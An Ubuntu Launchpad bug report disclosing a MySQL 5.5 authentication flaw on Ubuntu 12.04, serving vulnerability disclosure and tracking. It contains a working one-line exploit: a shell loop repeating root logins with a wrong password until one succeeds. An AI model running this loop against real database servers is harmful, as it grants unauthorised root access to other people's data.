Ubuntu

local mysql root access - exploit in the wild

Reported by Ante Karamatić on 2012-06-11
258
This bug affects 1 person
Affects Status Importance Assigned to Milestone
mysql-5.5 (Ubuntu)
Undecided
Unassigned

Bug Description

MySQL bug that can be exploited by a simple:

for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done

Reproduced on Ubuntu 12.04 64bit.

more info at: http://seclists.org/oss-sec/2012/q2/493

Ante Karamatić (ivoks) on 2012-06-11
description: updated
To post a comment you must log in.
This report contains Public Security information  Edit
Everyone can see this security related information.

Other bug subscribers